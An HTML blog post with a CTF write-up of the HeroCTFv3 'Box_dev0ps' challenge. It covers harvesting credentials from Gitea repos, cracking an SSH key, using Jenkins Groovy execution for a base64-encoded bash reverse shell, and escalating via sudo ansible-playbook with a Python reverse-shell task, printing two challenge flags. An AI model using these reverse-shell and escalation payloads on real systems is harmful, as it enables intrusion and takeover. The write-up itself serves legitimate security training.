<!doctype html>
<html lang="en-us">
  <head>
    <title>HeroCTFv3 - Box_dev0ps - Write up // Itarow</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.68.3" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Itarow" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://itarow.github.io/css/main.min.93a6fb3f59f8b73cc421a59ee5368eba507d50e7ffacf0723c82b2d680307f27.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HeroCTFv3 - Box_dev0ps - Write up"/>
<meta name="twitter:description" content="Hi everyone, this is my write-up of the Box challenge from the HeroCTFv3, challenge which was created by xanhacks (https://twitter.com/xanhacks). The box was in three parts, first, get a shell on the first docker, after, get a shell on the second docker, and last part, get root privilege.
Foothold Nmap scan first (which was given) :
$ nmap -p 3000,8080,2222 box.heroctf.fr -sV Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 22:30 CEST Nmap scan report for box."/>

    <meta property="og:title" content="HeroCTFv3 - Box_dev0ps - Write up" />
<meta property="og:description" content="Hi everyone, this is my write-up of the Box challenge from the HeroCTFv3, challenge which was created by xanhacks (https://twitter.com/xanhacks). The box was in three parts, first, get a shell on the first docker, after, get a shell on the second docker, and last part, get root privilege.
Foothold Nmap scan first (which was given) :
$ nmap -p 3000,8080,2222 box.heroctf.fr -sV Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 22:30 CEST Nmap scan report for box." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://itarow.github.io/posts/heroctfv3-box_dev0ps/" />
<meta property="article:published_time" content="2021-04-27T15:43:15+02:00" />
<meta property="article:modified_time" content="2021-04-27T15:43:15+02:00" />


  </head>
  <body>
    <header class="app-header">
      <a href="https://itarow.github.io"><img class="app-header-avatar" src="/avatar.jpg" alt="Itarow" /></a>
      <h1>Itarow</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">/home/Itarow</a>
             - 
          
          <a class="app-header-menu-item" href="/tags">/tags</a>
      </nav>
      <p>CS student, wrtiting some write up of cool CTF&#39;s challenges and box</p>
      <div class="app-header-social">
        
          <a href="https://www.root-me.org/Itarow" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-flag">
  <title>Root-me</title>
  <path d="M4 15s1-1 4-1 5 2 8 2 4-1 4-1V3s-1 1-4 1-5-2-8-2-4 1-4 1z"></path><line x1="4" y1="22" x2="4" y2="15"></line>
</svg>
          </a>
        
          <a href="https://twitter.com/0xItarow" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>Twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg>
          </a>
        
          <a href="https://github.com/itarow" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
          <a href="https://app.hackthebox.eu/profile/409940" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-terminal">
  <title>HackTheBox</title>
  <polyline points="4 17 10 11 4 5"></polyline><line x1="12" y1="19" x2="20" y2="19"></line>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">HeroCTFv3 - Box_dev0ps - Write up</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Apr 27, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          4 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://itarow.github.io/tags/ctf/">CTF</a>
              <a class="tag" href="https://itarow.github.io/tags/write-up/">Write-up</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <p>Hi everyone, this is my write-up of the Box challenge from the HeroCTFv3, challenge which was created by xanhacks (<a href="https://twitter.com/xanhacks)">https://twitter.com/xanhacks)</a>. The box was in three parts, first, get a shell on the first docker, after, get a shell on the second docker, and last part, get root privilege.</p>
<h2 id="foothold">Foothold</h2>
<p>Nmap scan first (which was given) :</p>
<pre><code>$ nmap -p 3000,8080,2222 box.heroctf.fr -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 22:30 CEST
Nmap scan report for box.heroctf.fr (35.246.63.133)
Host is up (0.019s latency).
rDNS record for 35.246.63.133: 133.63.246.35.bc.googleusercontent.com

PORT     STATE SERVICE VERSION
2222/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
3000/tcp open  ppp?
8080/tcp open  http    Jetty 9.2.z-SNAPSHOT

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.06 seconds
</code></pre><p>There are two websites, a Gitea with two repositories :</p>
<p><img src="../../img/dev0ps/img1.png" alt=""></p>
<p>and a Jenkins website :</p>
<p><img src="../../img/dev0ps/img2.png" alt=""></p>
<p>So we need to log in into Jenkins website.
So let’s search into the 2 repositories if we can find something interesting.
We see a .env file on the Infra repo :</p>
<p><img src="../../img/dev0ps/img3.png" alt=""></p>
<p>We tried to log in with admin and the MySQL password, but failed :(
Nothing more interesting on the Infra repo (except one thing that I’ve missed when I did the challenge) :</p>
<p><img src="../../img/dev0ps/img4.png" alt=""></p>
<p>And we are going to see that “heroes” was the admin password. On the moment, I’ve seen this, and I tried admin with “git:heroes” because I didn’t check the doc of chpasswd. We are going to put this on the time that it was.(5 a.m) :) .</p>
<p>So we checked Ecommerce repository, we see nothing clearly, so we checked the commits.</p>
<p><img src="../../img/dev0ps/img5.png" alt=""></p>
<p>Nice, we see this Private ssh key in one of the commit of Ecommerce repo.
After a few tries to log directly in ssh with, we try to crack it.</p>
<p><img src="../../img/dev0ps/img6.png" alt=""></p>
<p>Nice, we got the password, so we tried to log in with it with admin user and yup, we are in.</p>
<p><img src="../../img/dev0ps/img7.png" alt=""></p>
<p>Now we have to check for classic exploit with Jenkins.</p>
<p><img src="../../img/dev0ps/img8.png" alt=""></p>
<p>We see that we could execute groovy script. We are going to execute a malicious script to get a shell. Here it is :</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-java" data-lang="java">def sout <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> StringBuffer<span style="color:#f92672">(),</span> serr <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> StringBuffer<span style="color:#f92672">()</span>
def proc <span style="color:#f92672">=</span> <span style="color:#960050;background-color:#1e0010">&#39;</span>bash <span style="color:#f92672">-</span>c <span style="color:#f92672">{</span>echo<span style="color:#f92672">,</span>YmFzaCAtYyAnYmFzaCAtaSA<span style="color:#f92672">+</span>JiAvZGV2L3RjcC94eC54eC54eC54eHgveHh4eCAwPiYxJw<span style="color:#f92672">==}|{</span>base64<span style="color:#f92672">,-</span>d<span style="color:#f92672">}|{</span>bash<span style="color:#f92672">,-</span>i<span style="color:#f92672">}</span><span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">.</span><span style="color:#a6e22e">execute</span><span style="color:#f92672">()</span>
proc<span style="color:#f92672">.</span><span style="color:#a6e22e">consumeProcessOutput</span><span style="color:#f92672">(</span>sout<span style="color:#f92672">,</span> serr<span style="color:#f92672">)</span>
proc<span style="color:#f92672">.</span><span style="color:#a6e22e">waitForOrKill</span><span style="color:#f92672">(</span>1000<span style="color:#f92672">)</span>
println <span style="color:#e6db74">&#34;out&gt; $sout err&gt; $serr&#34;</span>
</code></pre></div><p>We put a little reverse shell one liner like this into base64 :</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">bash -c <span style="color:#e6db74">&#39;bash -i &gt;&amp; /dev/tcp/xx.xx.xx.xxx/xxxx 0&gt;&amp;1&#39;</span>
</code></pre></div><p>We’re just launched netcat, and we execute the script :</p>
<p><img src="../../img/dev0ps/img9.png" alt=""></p>
<p><img src="../../img/dev0ps/img10.png" alt=""></p>
<p>Yup, we are in the box, and we get the first flag : <code>Hero{dc97a2f7da5304d12fe820bd2a6d343d}</code></p>
<h2 id="pivot">Pivot</h2>
<p>We move into our folder, and we see this script in our home folder:</p>
<p><img src="../../img/dev0ps/img11.png" alt=""></p>
<p>So we find an OpenSSH private of the Gitea docker like we could see in the name of the script.
Let’s convert it into an RSA private key and tried to log in with.
We use this little script :</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh"><span style="color:#75715e">#!/usr/bin/env bash
</span><span style="color:#75715e"></span>
set -e
set -x

original_key<span style="color:#f92672">=</span>$1

puttygen_destinaton<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>original_key<span style="color:#e6db74">}</span>_puttygen
rsa_destinaton<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>original_key<span style="color:#e6db74">}</span>_rsa

<span style="color:#75715e"># FROM OPENSSH to SSH2 ENCRYPTED</span>
puttygen $original_key -O private-sshcom -o $puttygen_destinaton
<span style="color:#75715e"># FROM SSH2 ENCRYPTED format to RSA</span>
ssh-keygen -i -f $puttygen_destinaton &gt; $rsa_destinaton
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">$ sh convert.sh ../OPENSSH

$ file OPENSSH_rsa
OPENSSH_rsa: PEM RSA private key
</code></pre></div><p>Now we tried to log in the gitea container.</p>
<p><img src="../../img/dev0ps/img12.png" alt=""></p>
<p>We see the docker file of Gitea container, and we see that the username is “git”.
So we try to log in ssh with the private key on the port 2222 which was the ssh port.</p>
<p><img src="../../img/dev0ps/img12.png" alt=""></p>
<p>Now, time to root part, a simple sudo -l going to tell us what we have to do :)</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">gitea:~$ sudo -l
User git may run the following commands on gitea:
    <span style="color:#f92672">(</span>ALL<span style="color:#f92672">)</span> NOPASSWD: /usr/bin/ansible-playbook
</code></pre></div><p>Few search of the ansible-playbook command, and we see that it allow running YAML script to automatize tasks.
We also see that we could execute bash script/commands.
So, we could execute the command with this, and we could execute the command with sudo rights, so game over :)
We are going to use this YAML script :</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-yaml" data-lang="yaml">- <span style="color:#66d9ef">name</span>: Shell
  <span style="color:#66d9ef">hosts</span>: localhost
  <span style="color:#66d9ef">tasks</span>:
    - <span style="color:#66d9ef">name</span>: SHELL
      <span style="color:#66d9ef">shell</span>: python -c <span style="color:#e6db74">&#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#34;xx.xxx.xx.xxx&#34;,xxxx));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&#34;/bin/sh&#34;,&#34;-i&#34;]);&#39;</span>
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">gitea:/tmp$ sudo /usr/bin/ansible-playbook shell.yml

...

TASK <span style="color:#f92672">[</span>SHELL<span style="color:#f92672">]</span> ********************************************************************************************************
...
</code></pre></div><p><img src="../../img/dev0ps/img14.png" alt=""></p>
<p>We get the reverse shell connection back :)
We put the second flag : <code>Hero{ce4e994cb477dec9b1ea876db647c562}</code>
Thanks to xanhacks, this was a really cool box which include a totally new functionality exploitation for me with the root part.
Thanks for reading and see you later :)</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
